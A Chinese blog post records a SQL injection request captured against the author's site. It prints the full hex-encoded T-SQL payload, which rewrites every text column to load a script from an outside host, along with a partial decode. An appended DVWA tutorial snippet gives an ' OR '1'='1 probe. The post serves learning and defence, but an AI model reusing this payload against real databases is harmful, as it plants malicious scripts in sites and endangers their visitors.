抓到的一个 SQL Injection 包

本文记录了一次网站遭遇SQL注入攻击的经历,详细展示了攻击者利用特定的SQL代码进行非法操作的过程。通过具体实例,帮助读者了解SQL注入的工作原理及其危害。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

最近网站一直被骚扰,只有记录一下这些无聊哥们的手段。我也学习学习。

注射串: 


221.229.160.232
/index.asp

';DECLARE @S CHAR(4000);SET @S
CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F696D6167652E706F73742E746F6D2E636F6D2F41727469636C65496D6167652F3231332F3536332F4243303030393732323030382F303731352F313231363131333235332E6A7067223E3C2F7363726970743E3C212D2D2727776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F696D6167652E706F73742E746F6D2E636F6D2F41727469636C65496D6167652F3231332F3536332F4243303030393732323030382F303731352F313231363131333235332E6A7067223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);
==========GET==========

解码串:
DECLARE
  @T varchar(255),
  @C varchar(4000) DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
  OPEN Table_Cursor FETCH NEXT FROM  Tab

结果串:

spt_values name
spt_fallback_db xserver_name
spt_fallback_db name
spt_fallback_dev xserver_name
spt_fallback_dev name
spt_fallback_dev phyname
spt_fallback_usg xserver_name
spt_provider_types type_name
spt_provider_types literal_prefix
spt_provider_types literal_suffix
spt_provider_types local_type_name
spt_datatype_info_ext CREATE_PARAMS
spt_datatype_info_ext typename
MSreplication_options optname
spt_datatype_info TYPE_NAME
spt_datatype_info LITERAL_PREFIX
spt_datatype_info LITERAL_SUFFIX
spt_datatype_info CREATE_PARAMS
spt_datatype_info LOCAL_TYPE_NAME
spt_server_info attribute_name
spt_server_info attribute_value

利用抓工具分析并实施SQL注入通常是在web应用程序安全测试(如对DVWA进行渗透测试)过程中的一种技术手段。在这个场景下,比如针对DVWA(Damn Vulnerable Web Application,一个用于教育和演示常见Web应用漏洞的开源工具)中Blind SQL Injection模块,你需要: 1. **环境准备**: 首先,打开DVWA,并登录到SQL Injection部分的页面。例如,盲SQL注入部分通常是`/vulnerabilities/sqli_blind/`。 2. **捕获原始请求**: 使用网络抓工具,如Wireshark、Fiddler或Chrome DevTools等,连接到你的服务器并在目标URL上拦截HTTP请求。选择“编辑”或“复制”原始GET或POST数据。 3. **修改请求**: 在原始请求中,通常会有一个输入字段,可以尝试输入一些SQL关键字或者构造式,比如 ` UNION SELECT 1,2,3 -- `(这会尝试获取数据库的一些信息)。关键在于如何在正常的输入字符之间插入SQL语法。 4. **查看响应变化**: 当提交这个改动后的请求时,观察返回的响应是否有所改变。如果服务器返回了意外的数据或者格式错误,那可能是注入成功的迹象。 5. **抓截图**: 抓取并保存原始请求和异常响应的截图,证明你确实影响了服务器的行为。 6. **注入代码示例**: 由于这是一个文本平台,我无法直接提供代码,但基本步骤就是: ```sql http://example.com/vulnerabilities/sqli_blind/?id=1' OR '1'='1 ``` 这里的`id`字段会被SQL解析器视为条件,可能会返回某些数据库元数据。 7. **结果截图**: 可能会看到敏感信息(如数据库列名)泄露,或者特定预期的结果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值